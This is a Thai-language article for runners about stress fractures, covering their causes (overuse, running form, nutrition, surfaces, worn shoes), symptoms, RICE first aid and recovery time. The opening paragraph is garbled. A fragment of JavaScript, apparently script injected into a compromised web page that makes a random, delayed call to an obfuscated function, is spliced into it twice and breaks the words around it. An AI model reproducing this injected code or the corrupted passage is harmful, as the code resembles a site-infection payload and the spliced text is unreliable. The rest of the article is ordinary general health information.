นอกเหนือจากอาการเท้าผุผองและแผลสดจากการเสียดสีในบริเวณข้อพักต่างๆ (blisters andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and chafing) อาการโรครองช้ำ (Plantar fasciitis) อาการปวด IT Bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and แล้ว เจ้าอาการบาดเจ็บที่น่ากลัวมากที่สุดอย่างหนึ่งคือ อาการกระดูกร้าว (stress fracture) ซึ่งเป็นอาการบาดเจ็บที่มักเกิดจากการ overuse ของนักวิ่ง
เรื่องควรรู้: อาการกระดูกร้าวจากการวิ่ง (stress fracture)
เรามาทำความรู้จักเพิ่มเติมกันว่า อาการกระดูกร้าวจากการวิ่ง (stress fracture) คืออะไร…มันคือการที่กระดูกมีการแตกร้าว (Crack) หรือมีอาการปวดบวม ฟกช้ำ อาจมีเลือดออกและเห็นเป็นจ้ำห้อเลือด ในหมู่นักวิ่งอาการกระดูกร้าวจะเกิดบริเวณ Lower Body หรือส่วนขาเป็นหลัก เมื่อกล้ามเนื้อมีอาการเมื่อยล้าและไม่สามารถซับแรงกระแทกได้ แรงกระแทกจะส่งผ่านกล้ามเนื้อเข้าสู่กระดูกโดยตรง เมื่อแรงกระแทกมากๆ เข้าจะเกิดอาการแตกร้าวเล็กๆ ขึ้น
อาการกระดูกร้าวจากการวิ่ง (stress fracture) เกิดจากการ Overuse ของนักวิ่งและ 80% เกิดบริเวณขาและฝ่าเท้า (ส่วน Lower Body) โดยเฉพาะบริเวณกระดูกที่อยู่ระหว่างกระดูกนิ้วเท้าและข้อเท้า ชุดกระดูกที่เรียกว่า metatarsals มีอยู่ด้วยกันห้าชิ้น กระดุกชุดนี้จะรับแรงทุกครั้งที่ก้าวเดินหรือวิ่ง นอกจากชุดกระดูกนี้ก็จะมีบริเวณส้นเท้าและข้อเท้าหรือบริเวณ Midfoot

อะไรเป็นสาเหตุให้เกิดอาการกระดูกร้าวจากการวิ่ง (stress fracture) บ้าง
1. Overuse เป็นอาการบาดเจ็บที่เกิดจาการสะสมแรงกระแทกมาเรื่อยๆ สักระยะเวลาหนึ่ง กระดูกเมื่อถูกกระแทกซ้ำๆ จะเกิดอาการบาดเจ็บเล็กๆ หากไม่มีเวลาให้พักฟื้นก็จะเกิดรอยร้าวขึ้นมาได้
การเกิดรอยร้าวของกระดูกมักจะเกิดจากการวิ่งเพิ่มระยะของนักวิ่งอย่างรวดเร็ว หรือจะเป็นการฝึกซ้อมที่หนัก และที่สำคัญคือไม่มีเวลาให้ร่างกายได้พักฟื้นเพื่อให้เวลาร่างกายได้ซ้อมแซมและปรับตัวรองรับกับ workload ที่จะเกิดขึ้น
2. Form หรือฟอร์มการวิ่งของนักวิ่ง โดยเฉพาะฟอร์มการวิ่งที่over strike หรือคนที่ลงส้น (heel strike) มักจะเกิดอาการกระดูกร้าวได้ง่าย โดยแรงกระแทกจะถูกส่งไปยังบริเวณเอวโดยตรง ทำให้กระดูกส่วนต้นขาหรือส่วนสะโพกแตกร้าวได้ (Femoral neck fracture) แต่เมื่อเปลี่ยนมาวิ่งแบบ Forefoot เองก็มีความเสี่ยงเหมือนกัน เพราะแรงกระแทกจะถูกส่งไปยังฝ่าเท้าและข้อเท้ามากขึ้น นอกจากนี้การปรับเปลี่ยนมาวิ่งรองเท้าแบบมินิมอลเองก็มีความเสี่ยง ใส่แล้ววิ่งสับขาเร็ว กระดูกส่วน metatarsals ก็จะมีโอกาสเกิดอาการแตกร้าวได้เช่นกัน
3. การขาดสารอาหาร (Nutrition) การขาดสารอาหาร โดยเฉพาะวิตามินดีและแคลเซียม จะทำให้มีความเสี่ยงในการเกิดรอยแตกร้าวได้สูง หรือจะเป็นการขาดสารอาหารเพื่อซ้อมแซมร่างกาย การดื่มกาแฟอีนและเกลือที่มากเกินไปก็ส่งผลได้เช่นกัน
4. พื้นผิวถนนที่วิ่ง การวิ่งบนลู่วิ่งที่อ่อนนุ่มน่าเกินไป เมื่อมาลงคอร์สสนามวิ่งจริงที่แข็งกว่าก็จะเกิดอาการเตกร้าวได้ หรือการวิ่งบนพื้นถนนเดิมๆ แล้วเปลี่ยนไปเป็นแบบอื่นทันที ก็มีผลเช่นกัน
5. อุปกรณ์การวิ่งเสื่อมสภาพ โดยเฉพาะรองเท้าวิ่งที่หมดอายุการใช้งาน พวกโฟมส่วน midsole จะไม่สามารถซึมซับรับแรงกระแทกได้
ลักษณะอาการบาดเจ็บที่สามารถสังเกตได้หากเกิด อาการแตกร้าว
- เกิดอาการปวดระหว่างวิ่งและเจ็บมากขึ้นเรื่อยๆ ยิ่งวิ่งยิ่งปวดเพิ่ม
- อาการปวดรุนแรงหรือ Sharp pain สามารถระบุจุดปวดได้ว่ามาจากข้อกระดูกบริเวณไหน
- พักแล้วก็ยังเจ็บ
- อาการปวดและบวมบริเวณฝ่าเท้าหรือบริเวณข้อเท้า
อาการแตกร้าวสามารถเกิดขึ้นได้ทันทีโดยไม่มีการบอกกล่าวล่วงหน้า หากอยู่ๆ ก็เกิดอาการปวดขึ้นมาทันที ก็ให้หยุดวิ่งทันที ปฐมพยาบาลเบื้องต้นด้วยหลักการ RICE: R = rest (พัก) I = ice(น้ำเเข็ง) C = compression(รัด) E = elevation(ยก) และพยายามเข้าพบหมอทันทีหรือโดยเร็วที่สุด ทังนี้เวลาในการพักฟื้นอาจจะกินระยะเวลาถึง 6-8 สัปดาห์หรือมากว่านี้ก็ได้ ขึ้นอยู่กับระดับอาการบาดเจ็บ
อ้างอิง www.runnersworld.com